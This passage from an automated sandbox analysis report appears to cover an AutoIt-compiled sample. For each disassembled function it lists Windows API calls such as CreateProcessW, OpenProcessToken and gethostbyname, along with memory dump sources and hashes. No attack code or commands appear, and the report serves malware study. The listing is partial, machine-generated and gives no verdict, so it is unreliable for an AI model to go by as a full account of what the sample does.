                                                                        • Instruction Fuzzy Hash: D811A372504A19AECF212F78BC49F9E3BA8FB043A1B14452EF908DA351DE30D981D791
                                                                        Function 008944A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 008944CF
                                                                          • Part of subcall function 0089407C: _memset.LIBCMT ref: 008940FC
                                                                          • Part of subcall function 0089407C: _wcscpy.LIBCMT ref: 00894150
                                                                          • Part of subcall function 0089407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00894160
                                                                        • KillTimer.USER32(?,00000001,?,?), ref: 00894524
                                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00894533
                                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 008CD4B9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                                        • String ID:
                                                                        • API String ID: 1378193009-0
                                                                        • Opcode ID: 547b8328f92b71986a02bc6f1686a38b31ffb90bfccefc67026edb8a75309ff1
                                                                        • Instruction ID: 6ad156cbc844250ff8f11b2f3f9c565e7d46b35ea5d3b4099ec5584e39c744eb
                                                                        • Opcode Fuzzy Hash: 547b8328f92b71986a02bc6f1686a38b31ffb90bfccefc67026edb8a75309ff1
                                                                        • Instruction Fuzzy Hash: 7E21F5705087889FEB32AB648855FE6BBECFB01308F08409DE79ED6182C3746985DB45
                                                                        Function 008C9851 Relevance: 6.1, APIs: 4, Instructions: 63memoryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • __setmode_nolock.LIBCMT ref: 008C98A8
                                                                        • GetProcessHeap.KERNEL32(00000000,?), ref: 008C98B4
                                                                        • HeapFree.KERNEL32(00000000), ref: 008C98BB
                                                                        • __lseeki64_nolock.LIBCMT ref: 008C993E
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Heap$FreeProcess__lseeki64_nolock__setmode_nolock
                                                                        • String ID:
                                                                        • API String ID: 2225363126-0
                                                                        • Opcode ID: 66ec43ad0cfa251ac60e7fc983bf2fca4d5b0bc051ea8910a770e41b5ab42137
                                                                        • Instruction ID: 94528584d240d4a2050b34d037e7c4e5f783993c0d3cd6a9f04d67ad1f849e36
                                                                        • Opcode Fuzzy Hash: 66ec43ad0cfa251ac60e7fc983bf2fca4d5b0bc051ea8910a770e41b5ab42137
                                                                        • Instruction Fuzzy Hash: 8E11CE32904508EADB105AB88C4AFAD7A34FF07730F2403B9F4A8D31E1D636C951A262
                                                                        Function 00906369 Relevance: 6.1, APIs: 4, Instructions: 61networkCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00895A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000000,00000000,00000000,00000000,00000000,?,008F7896,?,?,00000000), ref: 00895A2C
                                                                          • Part of subcall function 00895A15: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,?,00000000,00000000,?,?,008F7896,?,?,00000000,?,?), ref: 00895A50
                                                                        • gethostbyname.WSOCK32(?,?,?), ref: 00906399
                                                                        • WSAGetLastError.WSOCK32(00000000), ref: 009063A4
                                                                        • _memmove.LIBCMT ref: 009063D1
                                                                        • inet_ntoa.WSOCK32(?), ref: 009063DC
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ByteCharMultiWide$ErrorLast_memmovegethostbynameinet_ntoa
                                                                        • String ID:
                                                                        • API String ID: 1504782959-0
                                                                        • Opcode ID: ba71155c719535ac1cec2f7f6eeddfbeca4fe882f992fe75a40706b867df7d94
                                                                        • Instruction ID: 9b85ece15056aa0f4db64be8a385f17c244aacdbe2aec5c8f84c5cec80ccc8b1
                                                                        • Opcode Fuzzy Hash: ba71155c719535ac1cec2f7f6eeddfbeca4fe882f992fe75a40706b867df7d94
                                                                        • Instruction Fuzzy Hash: 24110D31604109AFCF05FBA8D956DEEB7B8FF45320B144065F506E71A1DB31AE14DB62
                                                                        Function 008E8B41 Relevance: 6.1, APIs: 4, Instructions: 59windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 008E8B61
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008E8B73
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008E8B89
                                                                        • SendMessageW.USER32(?,000000C9,?,00000000), ref: 008E8BA4
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: c35f1a5ce1262c78c9e2a1210b07ccf3592e8a9741d447da8702d1257050b6fc
                                                                        • Instruction ID: 03b24a4f23d6f5b40ad04cda144625bbf35993f4a66877acf9779b5dcdfd9c0a
                                                                        • Opcode Fuzzy Hash: c35f1a5ce1262c78c9e2a1210b07ccf3592e8a9741d447da8702d1257050b6fc
                                                                        • Instruction Fuzzy Hash: 89112E79901218FFDB11DF95CC85F9DBB74FB49710F204095E904B7250DA716E11DB94
                                                                        Function 00891290 Relevance: 6.1, APIs: 4, Instructions: 59COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 00892612: GetWindowLongW.USER32(?,000000EB), ref: 00892623
                                                                        • DefDlgProcW.USER32(?,00000020,?), ref: 008912D8
                                                                        • GetClientRect.USER32(?,?), ref: 008CB5FB
                                                                        • GetCursorPos.USER32(?), ref: 008CB605
                                                                        • ScreenToClient.USER32(?,?), ref: 008CB610
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Client$CursorLongProcRectScreenWindow
                                                                        • String ID:
                                                                        • API String ID: 4127811313-0
                                                                        • Opcode ID: f948898cc16bd0843cdb2ce10d858b54db30e0ec65a34f5bbcc7a928e50e6a7d
                                                                        • Instruction ID: f446f680b512e3d87070849c52190dd52341a3de9a817b2ec19ac96dc384d5fa
                                                                        • Opcode Fuzzy Hash: f948898cc16bd0843cdb2ce10d858b54db30e0ec65a34f5bbcc7a928e50e6a7d
                                                                        • Instruction Fuzzy Hash: D211463561801EAFCF00EF98C8899EE77B9FB05301F4044A5F901E7141C730BA51DBA5
                                                                        Function 008F1142 Relevance: 6.1, APIs: 4, Instructions: 51sleepCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 008F115F
                                                                        • Sleep.KERNEL32(00000000), ref: 008F1184
                                                                        • QueryPerformanceCounter.KERNEL32(?), ref: 008F118E
                                                                        • Sleep.KERNEL32(?), ref: 008F11C1
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CounterPerformanceQuerySleep
                                                                        • String ID:
                                                                        • API String ID: 2875609808-0
                                                                        • Opcode ID: eb1758f6e1e41a0ebc9a5388628eaeee4c49602c83f8789947d233f04d51bd04
                                                                        • Instruction ID: cb13664a4b23aad648a08f1e1ab7df0901589e44edef9782c4eeb8858027073d
                                                                        • Opcode Fuzzy Hash: eb1758f6e1e41a0ebc9a5388628eaeee4c49602c83f8789947d233f04d51bd04
                                                                        • Instruction Fuzzy Hash: BC111831D0491DEBCF009FA5D848AFEBB78FB09711F004155EB45F2240CB709590DB95
                                                                        Function 008ED831 Relevance: 6.0, APIs: 4, Instructions: 50registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetModuleFileNameW.KERNEL32(?,?,00000104,00000000,00000000), ref: 008ED84D
                                                                        • LoadTypeLibEx.OLEAUT32(?,00000002,?), ref: 008ED864
                                                                        • RegisterTypeLib.OLEAUT32(?,?,00000000), ref: 008ED879
                                                                        • RegisterTypeLibForUser.OLEAUT32(?,?,00000000), ref: 008ED897
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Type$Register$FileLoadModuleNameUser
                                                                        • String ID:
                                                                        • API String ID: 1352324309-0
                                                                        • Opcode ID: eb0d4c54306f39613b3ff2b6d0dfb70b61090659fee27fbeced99b586a05b59d
                                                                        • Instruction ID: 46b1642c832c3fec7b18db0e11c4f0ad9e465145cd41dc5ca079edf59e680b82
                                                                        • Opcode Fuzzy Hash: eb0d4c54306f39613b3ff2b6d0dfb70b61090659fee27fbeced99b586a05b59d
                                                                        • Instruction Fuzzy Hash: AF115EB5605369EBE320CF52DC08F92BBBCFB01B04F108979A916D6090D7B1E549EBA1
                                                                        Function 008C6FB7 Relevance: 6.0, APIs: 4, Instructions: 48COMMONLIBRARYCODE
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: __cftoe_l__cftof_l__cftog_l__fltout2
                                                                        • String ID:
                                                                        • API String ID: 3016257755-0
                                                                        • Opcode ID: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                        • Instruction ID: 3c4994fc95b32946bc3f3d800b79613169dbf5187d28ded614d7c51e096edb17
                                                                        • Opcode Fuzzy Hash: a65d1881d29c7e947f5b32dbcea64912f89e558cad637ae539af3f1adf23f7b4
                                                                        • Instruction Fuzzy Hash: CD014B7244854EBBCF165E89DC01DEE3F72FB28394F588419FA1898031D636C9B1AF81
                                                                        Function 0091B2C5 Relevance: 6.0, APIs: 4, Instructions: 47COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetWindowRect.USER32(?,?), ref: 0091B2E4
                                                                        • ScreenToClient.USER32(?,?), ref: 0091B2FC
                                                                        • ScreenToClient.USER32(?,?), ref: 0091B320
                                                                        • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,00000000), ref: 0091B33B
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ClientRectScreen$InvalidateWindow
                                                                        • String ID:
                                                                        • API String ID: 357397906-0
                                                                        • Opcode ID: 83b1cc44a8afe9ea3a33509dc9460e08f2600a11ac91b36d15159939fc8c1b2e
                                                                        • Instruction ID: dec6bd1796e9fc8ea3ed4b840f0754fe2a732063d40996e48a7ce780de70933b
                                                                        • Opcode Fuzzy Hash: 83b1cc44a8afe9ea3a33509dc9460e08f2600a11ac91b36d15159939fc8c1b2e
                                                                        • Instruction Fuzzy Hash: F6114679E0420DEFDB41CF99C4449EEBBB9FB08310F108166E914E3220D735AA65DF50
                                                                        Function 0091B635 Relevance: 6.0, APIs: 4, Instructions: 40processCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • _memset.LIBCMT ref: 0091B644
                                                                        • _memset.LIBCMT ref: 0091B653
                                                                        • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00956F20,00956F64), ref: 0091B682
                                                                        • CloseHandle.KERNEL32 ref: 0091B694
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: _memset$CloseCreateHandleProcess
                                                                        • String ID:
                                                                        • API String ID: 3277943733-0
                                                                        • Opcode ID: 79c8c3eee8080227d787571739e7c5e6fb93d8b4f03d9301e1820d9769e8e19c
                                                                        • Instruction ID: 3a496c33dbaa7dfb0f0f6ade1e4ea5268d5cd8bf16ec29003414522eef97cfee
                                                                        • Opcode Fuzzy Hash: 79c8c3eee8080227d787571739e7c5e6fb93d8b4f03d9301e1820d9769e8e19c
                                                                        • Instruction Fuzzy Hash: B8F05EB2A543087AE7106766BC06FBB3A9CEB08396F804420BE09E61A2D7714C00D7A9
                                                                        Function 008F6BDA Relevance: 6.0, APIs: 4, Instructions: 33COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • EnterCriticalSection.KERNEL32(?), ref: 008F6BE6
                                                                          • Part of subcall function 008F76C4: _memset.LIBCMT ref: 008F76F9
                                                                        • _memmove.LIBCMT ref: 008F6C09
                                                                        • _memset.LIBCMT ref: 008F6C16
                                                                        • LeaveCriticalSection.KERNEL32(?), ref: 008F6C26
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CriticalSection_memset$EnterLeave_memmove
                                                                        • String ID:
                                                                        • API String ID: 48991266-0
                                                                        • Opcode ID: 32cff1e3ffff519bf6543235c65902eb46b97c4c71ec92a642ca2da4f26a3c88
                                                                        • Instruction ID: cce799b5051852fe955047c791f39247d546cbd6d852b58cdbb4be9072fae38b
                                                                        • Opcode Fuzzy Hash: 32cff1e3ffff519bf6543235c65902eb46b97c4c71ec92a642ca2da4f26a3c88
                                                                        • Instruction Fuzzy Hash: D5F05E7A204104ABCF016F59DC85A8ABB2AFF45321F08C061FE089E227C731E811DBB5
                                                                        Function 00892218 Relevance: 6.0, APIs: 4, Instructions: 23COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetSysColor.USER32(00000008), ref: 00892231
                                                                        • SetTextColor.GDI32(?,000000FF), ref: 0089223B
                                                                        • SetBkMode.GDI32(?,00000001), ref: 00892250
                                                                        • GetStockObject.GDI32(00000005), ref: 00892258
                                                                        • GetWindowDC.USER32(?,00000000), ref: 008CBE83
                                                                        • GetPixel.GDI32(00000000,00000000,00000000), ref: 008CBE90
                                                                        • GetPixel.GDI32(00000000,?,00000000), ref: 008CBEA9
                                                                        • GetPixel.GDI32(00000000,00000000,?), ref: 008CBEC2
                                                                        • GetPixel.GDI32(00000000,?,?), ref: 008CBEE2
                                                                        • ReleaseDC.USER32(?,00000000), ref: 008CBEED
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Pixel$Color$ModeObjectReleaseStockTextWindow
                                                                        • String ID:
                                                                        • API String ID: 1946975507-0
                                                                        • Opcode ID: a84e7eff3e08edf56ce611e0f17baa1cf6adee1618273d951fe89f023c56ad74
                                                                        • Instruction ID: e8c5a8fde8e1595628ccb6255192363b0d048ed29d7cee572fd54c9e82a4b0d9
                                                                        • Opcode Fuzzy Hash: a84e7eff3e08edf56ce611e0f17baa1cf6adee1618273d951fe89f023c56ad74
                                                                        • Instruction Fuzzy Hash: 37E03031258148FADF215FA4FC0DBD83B21EB05336F14C36AFA69880E1C7714984EB11
                                                                        Function 008E8712 Relevance: 6.0, APIs: 4, Instructions: 23threadCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetCurrentThread.KERNEL32 ref: 008E871B
                                                                        • OpenThreadToken.ADVAPI32(00000000), ref: 008E8722
                                                                        • GetCurrentProcess.KERNEL32(00000028,?), ref: 008E872F
                                                                        • OpenProcessToken.ADVAPI32(00000000), ref: 008E8736
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: CurrentOpenProcessThreadToken
                                                                        • String ID:
                                                                        • API String ID: 3974789173-0
                                                                        • Opcode ID: b3ae108d4aca59fe9d1aa58d28412a3cea5dd3a5b98a86ce7f04628866a30e41
                                                                        • Instruction ID: 5dda7c92cca8d691bbae16ccead640a5f1132b03f91e8e5b6a03e17032901084
                                                                        • Opcode Fuzzy Hash: b3ae108d4aca59fe9d1aa58d28412a3cea5dd3a5b98a86ce7f04628866a30e41
                                                                        • Instruction Fuzzy Hash: 22E02636729211DFD7205FF15C0CBCA3BACEF157D1F10C828B249D9040DA348445D710
                                                                        Function 008EB2F3 Relevance: 5.5, APIs: 1, Strings: 2, Instructions: 241comCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • OleSetContainedObject.OLE32(0000000C,00000001), ref: 008EB4BE
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: ContainedObject
                                                                        • String ID: AutoIt3GUI$Container
                                                                        • API String ID: 3565006973-3941886329
                                                                        • Opcode ID: cf01601bbb89f133627d6a71abfbf147cd21fc1fcf5f40c010a7c24bf2eeec10
                                                                        • Instruction ID: d93567e4d69bcc6901d88e95a2db73d1e49b0721fce34af5c7e566bd59552e9a
                                                                        • Opcode Fuzzy Hash: cf01601bbb89f133627d6a71abfbf147cd21fc1fcf5f40c010a7c24bf2eeec10
                                                                        • Instruction Fuzzy Hash: E6915870200605AFDB14DF69C885B6BBBE5FF4A714F24856DE94ACB391DB70E841CB50
                                                                        Function 008FAFAC Relevance: 5.5, APIs: 2, Strings: 1, Instructions: 201shareCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                          • Part of subcall function 008AFC86: _wcscpy.LIBCMT ref: 008AFCA9
                                                                          • Part of subcall function 00899837: __itow.LIBCMT ref: 00899862
                                                                        • __wcsnicmp.LIBCMT ref: 008FB02D
                                                                        • WNetUseConnectionW.MPR(00000000,?,?,00000000,?,?,00000100,?), ref: 008FB0F6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.2154568725.0000000000891000.00000020.00000001.01000000.00000003.sdmp, Offset: 00890000, based on PE: true
                                                                        • Associated: 00000000.00000002.2154539337.0000000000890000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.000000000091F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154618582.0000000000944000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154767626.000000000094E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.2154811934.0000000000957000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_890000_8kDIr4ZdNj.jbxd
                                                                        Similarity
                                                                        • API ID: Connection__itow__wcsnicmp_wcscpy
                                                                        • String ID: LPT
                                                                        • API String ID: 2143227475-1350329615
                                                                        • Opcode ID: e0c03dbe2b3a5dc9c9729cf23d5e7ecf8bfe2cd45226a3b1ad4b972791089e59
                                                                        • Instruction ID: 0534038f582f630777a389a6840e3dbd1842d7f2bc8c837674a25c41498716cd
                                                                        • Opcode Fuzzy Hash: e0c03dbe2b3a5dc9c9729cf23d5e7ecf8bfe2cd45226a3b1ad4b972791089e59
                                                                        • Instruction Fuzzy Hash: DB616275A0021DAFCB14DFA8C851EBEB7B5FB49310F144069F956EB251EB30AE80CB51
                                                                        Function 008962D1 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 185COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CharUpperBuffW.USER32(?,00000000,?,?,?,?,?,?,?,?,?,00000033), ref: 00896441
                                                                        Strings
                                                                        Memory Dump Source
